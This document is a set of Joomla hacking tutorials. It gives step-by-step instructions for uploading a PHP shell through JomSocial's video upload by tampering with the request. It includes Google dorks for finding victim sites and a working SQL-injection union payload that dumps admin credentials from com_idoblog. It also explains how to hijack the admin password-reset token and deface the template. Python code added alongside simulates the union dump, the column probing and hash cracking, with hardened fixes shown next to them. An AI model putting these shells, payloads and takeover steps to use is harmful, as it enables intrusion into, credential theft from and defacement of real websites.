JomSocial ~ Joomla Shell Upload Vulnerability
Stuff you need:
Firefox
A Shell
Tamper Data
Vulnerable Site
& a Brain 🙂
Preparation:
1. Get a PHP shell (recommended: c99.php).
2. Download Tamper Data.
3. Find a vulnerable site (refer to Dorking).
Dorks:
inurl:/com_community/
inurl:/images/originalvideos/
inurl:/index.php?option=com_community&view=videos
Preparing your Shell:
1. Download a shell.
2. Put it in a folder (e.g. "myshell").
3. Copy the shell within the same folder and rename the copy to "myshell.php.flv".
4. Now in your folder you have 2 files, "myshell.php" and "myshell.php.flv".
Getting Access to site:
1. Register a fake account.
2. Activate your fake account.
3. Go to your profile page.
4. Click on Add Video.
5. Choose Upload video from computer.
Uploading your Shell:
Upload a video from your computer. Note that if you only see "Add video from URL", the site is not vulnerable.
The reason for creating "myshell.php.flv" is to get past the extension check the upload form performs in the browser before the request is sent. That check never sees what you change in the request afterwards, which is why the .flv can be stripped again in Tamper Data.
Uploading shell:
1. Go to the upload page and click on Add Video.
2. Select Add video.
3. Select Upload from Computer.
4. Browse to your "myshell.php.flv".
5. Input a title.
**before you click on upload**
6. Firefox -> Tools -> Tamper Data, click on Start Tamper Data.
7. Now click UPLOAD.
8. Tamper Data will ask whether you want to tamper with the request; uncheck "Continue Tampering" and click Tamper.
9. Look for "myshell.php.flv" in the request and delete the .flv part, so that "myshell.php" is left.
10. Click Submit.
11. Wait for it, and you will see the successful upload page.
12. Congrats, you have uploaded a shell.
Shell location:
1. Go to http://[target]/images/originalvideos/
2. There you will find folders named with numbers (yours is most likely the last/bottom one).
3. Most of the folders will contain .flv, .avi etc.
4. Your folder will contain a randomly generated name with a .php extension.
5. Open your "random.php".
6. And you're in!
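Here is an added example (not JomSocial's code, nor from the original tutorial) that models the flow above in Python: the browser-side extension check, the multipart request the browser builds, the filename edit that Tamper Data performs by hand, and a server-side store that trusts the client extension beside one that does not. The allowlist, the magic-byte table, the images/originalvideos path and the placeholder payload are assumptions for the demo.

```python
import re
import secrets

# Added example, not JomSocial's code: a model of the upload flow described
# above.  The only extension check in the vulnerable flow runs in the browser,
# so the filename the server receives can be anything.

# Assumed allowlist and container signatures (offset, bytes).
MAGIC = {
    "flv": [(0, b"FLV\x01")],
    "avi": [(0, b"RIFF"), (8, b"AVI ")],
}
ALLOWED_EXT = set(MAGIC)
UPLOAD_DIR = "images/originalvideos"   # the path the tutorial walks to afterwards


def build_multipart(fields, file_field, filename, content, boundary="----formboundary"):
    """Build a multipart/form-data body the way the browser does.  `filename`
    is only a header value; the server never sees the local file name."""
    parts = []
    for name, value in fields.items():
        parts.append(
            f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"'
            f"\r\n\r\n{value}\r\n".encode()
        )
    parts.append(
        f'--{boundary}\r\nContent-Disposition: form-data; name="{file_field}"; '
        f'filename="{filename}"\r\nContent-Type: application/octet-stream\r\n\r\n'.encode()
        + content + b"\r\n"
    )
    parts.append(f"--{boundary}--\r\n".encode())
    return b"".join(parts)


def tamper_filename(body, old, new):
    """What the Tamper Data step does by hand: rewrite the filename after the
    browser-side check has already let the request through."""
    return body.replace(f'filename="{old}"'.encode(), f'filename="{new}"'.encode())


def client_side_check(filename):
    """The browser-side check the .php.flv trick is aimed at."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXT


def parse_upload(body):
    """Recover (filename, file bytes) from the multipart body."""
    m = re.search(rb'filename="([^"]*)"\r\nContent-Type: [^\r\n]*\r\n\r\n(.*?)\r\n--', body, re.S)
    if not m:
        raise ValueError("no file part")
    return m.group(1).decode(), m.group(2)


def vulnerable_store(body):
    """Keeps whatever extension the client sent, under a random name: a
    tampered 'myshell.php' lands as <random>.php in a web-served directory."""
    filename, _ = parse_upload(body)
    ext = filename.rsplit(".", 1)[-1]
    return f"{UPLOAD_DIR}/{secrets.token_hex(8)}.{ext}"


def hardened_store(body):
    """Server-side: exact-match the extension against the allowlist and check
    the container's magic bytes; returns (accepted, stored path or reason)."""
    filename, content = parse_upload(body)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext!r} not allowed"
    if not all(content[off:off + len(sig)] == sig for off, sig in MAGIC[ext]):
        return False, f"content does not look like {ext}"
    return True, f"{UPLOAD_DIR}/{secrets.token_hex(8)}.{ext}"
```

Compare vulnerable_store() with hardened_store() on the tampered body: the random filename alone does nothing when the extension comes from the client. Storing uploads outside the web root, or disabling script execution in the upload directory, is the backstop if a check is ever bypassed again.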
How to hack Joomla: Tutorial
Google dork: inurl:”option=com_mytube”
Type that dork into Google.
2- Inject Target
Find a url like this:
http://site.com/index.php?option=com_mytube&Itemid=88..
Now replace the url like this:
Click here to view: http://pastebin.com/ZxxU8Nsr
If the site is vulnerable, you will see something like this:
We can see the username, email and activation code (username:email:activation code).
Now leave this page open and open a new one.
3- Admin password reset
Go to:
http://www.site.com/index.php?option=com_user&view=reset
This is the standard Joomla! password reset request page.
Type the email address found in step 2 and press Submit.
A new activation code (the reset token) is now written to the same column you dumped.
Return to the first page, refresh it and take the new activation code.
Paste it into the token field and press Submit.
Problem with the token.. :((
UPDATE: Joomla! 1.5.16 now hashes the reset token before storing it, so reading the column no longer gives you something the form will accept.
If you see something like :$1$14411: after the activation code, it will not work.
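The reset-token weakness is easier to see in code. The following is an added example, not Joomla's own code: a simplified model in which a dict stands in for jos_users and a direct read stands in for the injection from step 2. The hashed variant assumes a salted MD5 of the token as the shape of the 1.5.16 fix; the exact scheme Joomla used is not shown on this page.

```python
import hashlib
import secrets

# Added example, not Joomla's code: a simplified model of the reset flow above.
# The dict stands in for the jos_users table and sqli_read_activation() for the
# injection that dumps username:email:activation.  The hashed scheme is an
# assumption about the shape of the fix, not Joomla 1.5.16's exact code.


def new_token():
    return secrets.token_hex(16)


class PlaintextTokenStore:
    """Pre-fix behaviour: the token e-mailed to the user is stored as-is."""

    def __init__(self):
        self.users = {"admin": {"email": "info@site.com", "activation": ""}}

    def request_reset(self, email):
        user = next(u for u in self.users.values() if u["email"] == email)
        token = new_token()
        user["activation"] = token      # readable by anyone who can read the table
        return token                    # this value only goes to the mailbox

    def confirm(self, submitted):
        return any(u["activation"] and secrets.compare_digest(u["activation"], submitted)
                   for u in self.users.values())


class HashedTokenStore(PlaintextTokenStore):
    """Post-fix behaviour: only a salted hash of the token is stored, so the
    value read out of the table is useless to the reset form."""

    def request_reset(self, email):
        user = next(u for u in self.users.values() if u["email"] == email)
        token, salt = new_token(), secrets.token_hex(8)
        user["activation"] = hashlib.md5((token + salt).encode()).hexdigest() + ":" + salt
        return token

    def confirm(self, submitted):
        for u in self.users.values():
            if not u["activation"]:
                continue
            digest, salt = u["activation"].split(":", 1)
            if secrets.compare_digest(hashlib.md5((submitted + salt).encode()).hexdigest(), digest):
                return True
        return False


def sqli_read_activation(store, username):
    """Stands in for step 2's injection: read the activation column directly."""
    return store.users[username]["activation"]


def attacker_takes_over(store):
    """Steps 2-3 from above: trigger a reset for the admin e-mail, re-read the
    column, submit what was read.  True means the reset form accepted it."""
    store.request_reset(store.users["admin"]["email"])
    leaked = sqli_read_activation(store, "admin")
    return store.confirm(leaked)
```

Hashing the stored token is defence in depth: the injection that exposes the column still has to be fixed, and a reset token should also expire and be single-use, neither of which this model enforces.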
4- Admin Login
If you did everything right, the new-password page will load. Enter your new password…
After that go to:
http://www.site.com/administrator/
This is the standard Joomla! administrator login.
Enter the username (found in step 2) and your new password, and click Login.
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In the Template HTML Editor insert your defacement code, click Apply, then Save, and you are done!!
Joomla Hacking Tutorial
If someone tells you that they HACKED Joomla, they're talking rubbish!!!
But people still hack sites that use Joomla as their Content Management System?!?
Joomla is made of components and modules, and there are developers apart from the
official team who offer their own extensions to improve Joomla.
The components and modules made by those other developers are the weak spots!
I hacked a site that used Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can't say that I hacked Joomla!
Finding Exploit And Target: those two steps can go in either order, depending on what you find first, target or exploit…
Google dork: inurl:”option=com_idoblog”
Comes up with results for about 140,000 pages
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vulnerability
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users–
The exploit can be separated into two parts:
Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opens the blog profile page of the admin user (userid 62 is the default Super Administrator id in Joomla! 1.5); if that profile doesn't exist, the exploit won't work (not completely confirmed).
Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users–
This part pulls username and password from the jos_users table. The UNION has to supply the same number of columns as the profile query (16 here), and concat_ws(0x3a,username,password) puts "username:password" into the one column the page actually renders.
Testing Vulnerability
Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab) >> untick ‘Load images automatically’
Go to:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
The site loads normally…
Go to:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
The site shows the admin's blog profile
Go to:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1–
If the page now errors or changes (a one-column UNION against a multi-column query is a SQL error), the input reaches the database unescaped: the site is vulnerable
Inject Target
Open reiluke SQLiHelper 2.7
In Target copy
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
and click on Inject
Follow the standard steps until you get to Column Name; as a result we have
Notice that the exploit from inj3ct0r wouldn't work here because it looks for the jos_users table, and as you can see
our target uses the jos153_users table (a non-default table prefix) for storing user data.
Dump username, email and password from the jos153_users table. Click on Dump Now
username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI
Joomla! 1.5.x hashes passwords with MD5. When a password is set, a random 32-character salt is appended to the
password before hashing, and the result is stored as {MD5(password+salt)}:{salt}, which is what the dump above shows.
The salt means each hash has to be attacked on its own, so cracking it takes time and time…
The easiest way in is to reset the Admin password instead!
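To tie the union payload and the hash format together, here is an added example that is not IDoBlog's or Joomla's code. It runs against an in-memory SQLite database (standing in for MySQL), probes the column count the way the union select 1-- test does, dumps username:hash:salt through the concatenated second column with the table prefix as a parameter, and then verifies and wordlist-cracks the Joomla! 1.5 hash. The table layout, the jos153_ prefix, the 16-column profile row and the demo password are constructed for the example.

```python
import hashlib
import secrets
import sqlite3

# Added example, not IDoBlog's or Joomla's code.  SQLite stands in for MySQL so
# the script runs offline; MySQL's concat_ws(0x3a, username, password) becomes
# username||':'||password.  Table names, the 16-column profile row and the
# admin password are constructed for the demo.

PREFIX = "jos153_"          # the non-default prefix noticed above
DEMO_PASSWORD = "Winter2010!"


def joomla15_hash(password, salt=None):
    """Joomla! 1.5 format: md5(password + salt):salt with a 32-char salt."""
    salt = salt or secrets.token_hex(16)
    return hashlib.md5((password + salt).encode()).hexdigest() + ":" + salt


def joomla15_verify(password, stored):
    digest, salt = stored.split(":", 1)
    return secrets.compare_digest(hashlib.md5((password + salt).encode()).hexdigest(), digest)


def make_db(prefix=PREFIX):
    db = sqlite3.connect(":memory:")
    extra = ", ".join(f"c{i} TEXT" for i in range(2, 17))   # userid + 15 = 16 columns
    db.execute(f"CREATE TABLE {prefix}profiles (userid INTEGER, {extra})")
    db.execute(f"INSERT INTO {prefix}profiles VALUES (62, {', '.join(['?'] * 15)})",
               [f"field{i}" for i in range(2, 17)])
    db.execute(f"CREATE TABLE {prefix}users (username TEXT, email TEXT, password TEXT)")
    db.execute(f"INSERT INTO {prefix}users VALUES (?, ?, ?)",
               ("admin", "info@site.com", joomla15_hash(DEMO_PASSWORD)))
    return db


def vulnerable_profile(db, userid, prefix=PREFIX):
    """How the component effectively builds its query: userid pasted in raw."""
    return db.execute(f"SELECT * FROM {prefix}profiles WHERE userid={userid}").fetchall()


def safe_profile(db, userid, prefix=PREFIX):
    """Cast to int and bind as a parameter; the payload never reaches the parser."""
    return db.execute(f"SELECT * FROM {prefix}profiles WHERE userid=?", (int(userid),)).fetchall()


def probe_column_count(query, max_cols=32):
    """The 'union select 1--' test generalised: grow the column list until the
    database stops rejecting the UNION for a column-count mismatch."""
    for n in range(1, max_cols + 1):
        try:
            query("62 UNION SELECT " + ",".join(str(i) for i in range(1, n + 1)) + "--")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def dump_users(query, ncols, prefix):
    """The exploit's part II with the prefix as a parameter; the concat sits in
    column 2 because that is the column the page renders."""
    cols = ["1", "username||':'||password"] + [str(i) for i in range(3, ncols + 1)]
    payload = f"62 UNION SELECT {','.join(cols)} FROM {prefix}users--"
    return [row[1] for row in query(payload) if row[0] == 1]


def crack(stored, wordlist):
    """One MD5 per guess per salt: fast, but the salt rules out shared tables."""
    return next((w for w in wordlist if joomla15_verify(w, stored)), None)


def injection_blocked(db, payload):
    """True when the parameterised query refuses the payload outright."""
    try:
        safe_profile(db, payload)
    except ValueError:
        return True
    return False


def demo():
    db = make_db()
    query = lambda uid: vulnerable_profile(db, uid)
    ncols = probe_column_count(query)                 # 16, matching the exploit
    username, stored = dump_users(query, ncols, PREFIX)[0].split(":", 1)
    return ncols, username, crack(stored, ["password", "admin", DEMO_PASSWORD])
```

demo() returns the detected column count, the dumped username and the recovered password; safe_profile() shows the fix, an integer cast plus a bound parameter, which turns the same payload into a ValueError rather than a query. MySQL reports the column mismatch with its own error text; SQLite's OperationalError plays that role here.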
Admin Password Reset
Go to:
http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request


